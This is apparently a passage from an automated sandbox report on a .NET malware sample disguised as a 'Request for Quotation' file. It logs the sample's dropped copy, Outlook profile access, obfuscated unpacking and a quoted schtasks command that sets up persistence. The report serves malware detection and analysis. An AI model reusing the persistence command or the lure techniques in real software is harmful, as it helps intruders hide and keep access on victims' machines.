Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: loadperf.dll
Source: C:\Windows\System32\wbem\WMIADAP.exe	Section loaded: ntmarta.dll

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\wbem\WMIADAP.exe

File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe, InnerForm.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: NuDUTBObHpKADz.exe.0.dr, InnerForm.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs	.Net Code: YO5PyZWuO8 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs	.Net Code: YO5PyZWuO8 System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 0_2_0153DB84 pushfd ; ret	0_2_0153DB89
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 0_2_07418918 push esp; iretd	0_2_07418919
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Code function: 9_2_06DE9241 push es; ret	9_2_06DE9244
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 10_2_0111DB84 pushfd ; ret	10_2_0111DB89
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 10_2_053D0D70 pushfd ; retf	10_2_053D0D7D
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_0269891E pushad ; iretd	14_2_0269891F
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_02698C2F pushfd ; iretd	14_2_02698C30
Source: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe	Code function: 14_2_02698DDF push esp; iretd	14_2_02698DE0

Source: Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Static PE information: section name: .text entropy: 7.5503065152862066
Source: NuDUTBObHpKADz.exe.0.dr	Static PE information: section name: .text entropy: 7.5503065152862066

Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, jf4Qf9XFgnwgV28YTi.cs	High entropy of concatenated method names: 'LU7X6yKwwO', 'ISNXK8UhhP', 'lAnNYVD5mk', 'cITN3tObOJ', 'n5mXVkRMfN', 'uyHXRf6GiT', 'OQGXQHsEOu', 'zVlXeyZ2Pr', 'y5yXSYt5pI', 'N8VXpxKA67'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, EXP714sBm2ctecZFQ5.cs	High entropy of concatenated method names: 'hTYuvl4xpZ', 'sKtu5ecsIW', 'FqDuAA9oIZ', 'pXLucgpQL6', 'RYNu9usi7e', 'iNru8fEyeF', 'gBQus4m7dM', 'fa9uHwZDnS', 't1cuGvSYmu', 't17uENLuNW'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, yNnsJdCNHPcY1XMT4rt.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XNkmu7q24b', 'gNxmBtjkrZ', 'R1smaTOOob', 'LaLmmZZcrV', 'A2smwgDiCu', 'EOTmfqKLHX', 'LbLmUk5BJV'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, l4lWgpboLH3dw1sHJl.cs	High entropy of concatenated method names: 'rTwdlcsTgq', 'HyWdoo6g6I', 'yKTdWP9ikF', 'H7xdF0mS7h', 'FYZdg3Wwkf', 'qekdrrnCSx', 'RK9dbyCdGa', 'OLqdh3KEI9', 'JYidObD6cT', 'z7Hd7Ex7S4'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, vfkoEZCFRkJoTb50MAj.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OIiBVwsHY5', 'a7hBRF6Y7C', 't2wBQNBWNV', 'APCBe1RjgL', 'KMrBSL5Ecj', 'O9EBpBC8Zw', 'xcBB05MyWo'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, NZGTi0WPFvt2i5LQMG.cs	High entropy of concatenated method names: 'ri2y7SFRe', 'nTtLtuH5s', 'UH7jK2aBj', 'EXRkxhCPh', 'On82QQf23', 'usx4Dg4ga', 'sgvU1JgIDJmVl5YaZH', 'BFu7LaGxdjqHuT5R8D', 'mCaNhwp54', 'dyNB0qmvq'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, dBMNChvaYpUXNoIXaf.cs	High entropy of concatenated method names: 'EYYboTeDi7', 'SwkbFM5Quw', 'rVRbrR03bo', 'NKMrKCAPW4', 'hKlrzIxIYb', 'aRRbY4PAX7', 'EUSb3PLF5i', 'RMHbJP2adb', 'ydmbdDU2jT', 'MIfbPyPB1D'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, mjll2lncEU9TxwTknr.cs	High entropy of concatenated method names: 'nlyM1yS4VI', 'QiXM2rNf0U', 'sS2MvvqiMQ', 'kB7M5cMXUq', 'G3WMcU8rhr', 'tEIM9IxnHI', 'hmNMsO57WX', 'qH2MH88X4l', 'xRJMExZIy5', 'xwMMVM96J0'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, By1IY6fiKcunMsajFa.cs	High entropy of concatenated method names: 'Gn0gZsZYa6', 'UjlgkA48Ww', 'sbdFAl4OtR', 'hGmFcv6Anq', 'lNlF9IpO7O', 'zxlF8qP1ns', 'y4yFsbD2ox', 'AXmFH6SISU', 'y5gFGRFD4w', 'SJdFEmoMOL'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, YChN0VCCf5YB3QfasmB.cs	High entropy of concatenated method names: 'jrDBKbxL56', 'NWmBz3tsCr', 'iBOaYDGYWt', 'bf8a3g8NES', 'gyEaJHsYIt', 'UW0adblTAv', 'DRtaP38MVY', 'B5ZalWiOFD', 'hZOaocUkO7', 'v51aWjGYF2'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, gAaOnDG3SbsRr2mZsZ.cs	High entropy of concatenated method names: 'Dispose', 'd8J3ISldek', 'gdIJ5YU2vT', 'rBmmiUHWfk', 'v563KI3Q0J', 'SCl3zEgFXl', 'ProcessDialogKey', 'jWqJYqZSjK', 'vyBJ3s2dAV', 'XiPJJEOxB9'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, Lv1bZR1o53kqNJhWi9.cs	High entropy of concatenated method names: 'I1irl7ttmn', 'OYnrWTXYTC', 'wvSrg7WJae', 'ysfrbfYN8p', 'QVArhCZppW', 'q1WgifatSk', 'gJPgnxHaiU', 'lQngD3LSdm', 'F5yg6d1kfE', 'JLvgIyDFcn'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, LF6Z39NPmJiiGMGn5i.cs	High entropy of concatenated method names: 'bMf3bTbBrJ', 'KPv3hE4eqS', 'sZu37uYUXL', 'o9N3qOJSUi', 'AOT3xqt3Gv', 'UtQ3tXfwaT', 'zn7O1X9cU5rqgcjeHW', 'Ub9ZHSFh9wtGPVrqic', 'SAT33gW8Ja', 'vF23dbwOJe'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, oxcHW9d8Tk42VoYgoA.cs	High entropy of concatenated method names: 'ToString', 'vNEtVKu3Uf', 'M6dt5HIixC', 'eXntAxZmZe', 'M9wtcUcIVv', 'Tmit9MLtZX', 'T1pt8AloPu', 'YbltsbiKEQ', 'l6xtHy4Tm8', 'NyMtGBS2Mk'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs	High entropy of concatenated method names: 'dTNWeujeSd', 'iYVWSYhiaU', 'tscWpRbRNj', 'jVfW0hrTja', 'hCEWiwQGhk', 'K81WnWuqof', 'U0QWDf0GSH', 'JjpW6VpIfI', 'JZwWIMiRDM', 'PGJWKfNIFR'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, Y06dj4BVu05CPVc5SN.cs	High entropy of concatenated method names: 'V7kuxExQyi', 'Ho4uXKx9l2', 'jP6uurjn06', 'iHsuaxZvCG', 'W1IuwPC2E0', 'UTAuUTMDCu', 'Dispose', 'fv3NoOCjDZ', 'v1pNW12oeA', 'A8jNFkrDbl'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, C9unB7URCgbFq78hEl.cs	High entropy of concatenated method names: 'bBSBFo5S2p', 'Bn0BghXOym', 'V6DBrc8Guc', 'hGJBbCRdIP', 'kufBuXeU3Z', 'T3BBhV94li', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, YXd5RkTUGDmJACNkFp.cs	High entropy of concatenated method names: 'ERXbC99M8p', 'kELbTsI4iF', 'WQ2byIGFqj', 'n94bLd9y5x', 'LJRbZwkA3B', 'FH5bjDDUic', 'eLHbkggdCY', 'WY4b1LcP1Q', 'SJlb2v9GqW', 'K68b4uJxWU'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, h6mhv9m54O6mTAWZxY.cs	High entropy of concatenated method names: 'CobFLlZaNc', 'vGeFjA8pEL', 'gZBF1B5JKa', 'MCWF2Xvsoh', 'XPUFxa7hIm', 'R2mFt7oGgM', 'vJnFXarwvQ', 'gliFNUh8YG', 'e9xFuc5lEn', 'tRCFBN8GEx'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.4374c40.1.raw.unpack, Fnk71RzLmXXcJ9kRSj.cs	High entropy of concatenated method names: 'OjYBjhSHDP', 'iq3B180i3V', 'pK0B2mt0jD', 'nBIBvlYdqP', 'GKKB5oUrnt', 'F39Bc6dDNl', 'wwnB96nrJV', 'pXXBUibPEX', 'PWdBCsBA2X', 'KmlBTxgNKj'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, jf4Qf9XFgnwgV28YTi.cs	High entropy of concatenated method names: 'LU7X6yKwwO', 'ISNXK8UhhP', 'lAnNYVD5mk', 'cITN3tObOJ', 'n5mXVkRMfN', 'uyHXRf6GiT', 'OQGXQHsEOu', 'zVlXeyZ2Pr', 'y5yXSYt5pI', 'N8VXpxKA67'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, EXP714sBm2ctecZFQ5.cs	High entropy of concatenated method names: 'hTYuvl4xpZ', 'sKtu5ecsIW', 'FqDuAA9oIZ', 'pXLucgpQL6', 'RYNu9usi7e', 'iNru8fEyeF', 'gBQus4m7dM', 'fa9uHwZDnS', 't1cuGvSYmu', 't17uENLuNW'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, yNnsJdCNHPcY1XMT4rt.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'XNkmu7q24b', 'gNxmBtjkrZ', 'R1smaTOOob', 'LaLmmZZcrV', 'A2smwgDiCu', 'EOTmfqKLHX', 'LbLmUk5BJV'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, l4lWgpboLH3dw1sHJl.cs	High entropy of concatenated method names: 'rTwdlcsTgq', 'HyWdoo6g6I', 'yKTdWP9ikF', 'H7xdF0mS7h', 'FYZdg3Wwkf', 'qekdrrnCSx', 'RK9dbyCdGa', 'OLqdh3KEI9', 'JYidObD6cT', 'z7Hd7Ex7S4'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, vfkoEZCFRkJoTb50MAj.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OIiBVwsHY5', 'a7hBRF6Y7C', 't2wBQNBWNV', 'APCBe1RjgL', 'KMrBSL5Ecj', 'O9EBpBC8Zw', 'xcBB05MyWo'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, NZGTi0WPFvt2i5LQMG.cs	High entropy of concatenated method names: 'ri2y7SFRe', 'nTtLtuH5s', 'UH7jK2aBj', 'EXRkxhCPh', 'On82QQf23', 'usx4Dg4ga', 'sgvU1JgIDJmVl5YaZH', 'BFu7LaGxdjqHuT5R8D', 'mCaNhwp54', 'dyNB0qmvq'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, dBMNChvaYpUXNoIXaf.cs	High entropy of concatenated method names: 'EYYboTeDi7', 'SwkbFM5Quw', 'rVRbrR03bo', 'NKMrKCAPW4', 'hKlrzIxIYb', 'aRRbY4PAX7', 'EUSb3PLF5i', 'RMHbJP2adb', 'ydmbdDU2jT', 'MIfbPyPB1D'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, mjll2lncEU9TxwTknr.cs	High entropy of concatenated method names: 'nlyM1yS4VI', 'QiXM2rNf0U', 'sS2MvvqiMQ', 'kB7M5cMXUq', 'G3WMcU8rhr', 'tEIM9IxnHI', 'hmNMsO57WX', 'qH2MH88X4l', 'xRJMExZIy5', 'xwMMVM96J0'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, By1IY6fiKcunMsajFa.cs	High entropy of concatenated method names: 'Gn0gZsZYa6', 'UjlgkA48Ww', 'sbdFAl4OtR', 'hGmFcv6Anq', 'lNlF9IpO7O', 'zxlF8qP1ns', 'y4yFsbD2ox', 'AXmFH6SISU', 'y5gFGRFD4w', 'SJdFEmoMOL'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, YChN0VCCf5YB3QfasmB.cs	High entropy of concatenated method names: 'jrDBKbxL56', 'NWmBz3tsCr', 'iBOaYDGYWt', 'bf8a3g8NES', 'gyEaJHsYIt', 'UW0adblTAv', 'DRtaP38MVY', 'B5ZalWiOFD', 'hZOaocUkO7', 'v51aWjGYF2'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, gAaOnDG3SbsRr2mZsZ.cs	High entropy of concatenated method names: 'Dispose', 'd8J3ISldek', 'gdIJ5YU2vT', 'rBmmiUHWfk', 'v563KI3Q0J', 'SCl3zEgFXl', 'ProcessDialogKey', 'jWqJYqZSjK', 'vyBJ3s2dAV', 'XiPJJEOxB9'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, Lv1bZR1o53kqNJhWi9.cs	High entropy of concatenated method names: 'I1irl7ttmn', 'OYnrWTXYTC', 'wvSrg7WJae', 'ysfrbfYN8p', 'QVArhCZppW', 'q1WgifatSk', 'gJPgnxHaiU', 'lQngD3LSdm', 'F5yg6d1kfE', 'JLvgIyDFcn'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, LF6Z39NPmJiiGMGn5i.cs	High entropy of concatenated method names: 'bMf3bTbBrJ', 'KPv3hE4eqS', 'sZu37uYUXL', 'o9N3qOJSUi', 'AOT3xqt3Gv', 'UtQ3tXfwaT', 'zn7O1X9cU5rqgcjeHW', 'Ub9ZHSFh9wtGPVrqic', 'SAT33gW8Ja', 'vF23dbwOJe'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, oxcHW9d8Tk42VoYgoA.cs	High entropy of concatenated method names: 'ToString', 'vNEtVKu3Uf', 'M6dt5HIixC', 'eXntAxZmZe', 'M9wtcUcIVv', 'Tmit9MLtZX', 'T1pt8AloPu', 'YbltsbiKEQ', 'l6xtHy4Tm8', 'NyMtGBS2Mk'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, qhA7Vpw3Pa7m92Y2sb.cs	High entropy of concatenated method names: 'dTNWeujeSd', 'iYVWSYhiaU', 'tscWpRbRNj', 'jVfW0hrTja', 'hCEWiwQGhk', 'K81WnWuqof', 'U0QWDf0GSH', 'JjpW6VpIfI', 'JZwWIMiRDM', 'PGJWKfNIFR'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, Y06dj4BVu05CPVc5SN.cs	High entropy of concatenated method names: 'V7kuxExQyi', 'Ho4uXKx9l2', 'jP6uurjn06', 'iHsuaxZvCG', 'W1IuwPC2E0', 'UTAuUTMDCu', 'Dispose', 'fv3NoOCjDZ', 'v1pNW12oeA', 'A8jNFkrDbl'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, C9unB7URCgbFq78hEl.cs	High entropy of concatenated method names: 'bBSBFo5S2p', 'Bn0BghXOym', 'V6DBrc8Guc', 'hGJBbCRdIP', 'kufBuXeU3Z', 'T3BBhV94li', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, YXd5RkTUGDmJACNkFp.cs	High entropy of concatenated method names: 'ERXbC99M8p', 'kELbTsI4iF', 'WQ2byIGFqj', 'n94bLd9y5x', 'LJRbZwkA3B', 'FH5bjDDUic', 'eLHbkggdCY', 'WY4b1LcP1Q', 'SJlb2v9GqW', 'K68b4uJxWU'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, h6mhv9m54O6mTAWZxY.cs	High entropy of concatenated method names: 'CobFLlZaNc', 'vGeFjA8pEL', 'gZBF1B5JKa', 'MCWF2Xvsoh', 'XPUFxa7hIm', 'R2mFt7oGgM', 'vJnFXarwvQ', 'gliFNUh8YG', 'e9xFuc5lEn', 'tRCFBN8GEx'
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe.7ca0000.4.raw.unpack, Fnk71RzLmXXcJ9kRSj.cs	High entropy of concatenated method names: 'OjYBjhSHDP', 'iq3B180i3V', 'pK0B2mt0jD', 'nBIBvlYdqP', 'GKKB5oUrnt', 'F39Bc6dDNl', 'wwnB96nrJV', 'pXXBUibPEX', 'PWdBCsBA2X', 'KmlBTxgNKj'

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

File created: C:\Users\user\AppData\Roaming\NuDUTBObHpKADz.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NuDUTBObHpKADz" /XML "C:\Users\user\AppData\Local\Temp\tmp8B51.tmp"

Source: C:\Windows\System32\wbem\WMIADAP.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WmiApRpl\Performance

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\wbem\WMIADAP.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Wbem\PROVIDERS\Performance Performance Data

Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.21.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
